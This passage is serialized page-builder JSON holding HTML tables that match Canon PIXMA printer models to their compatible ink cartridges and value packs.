width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 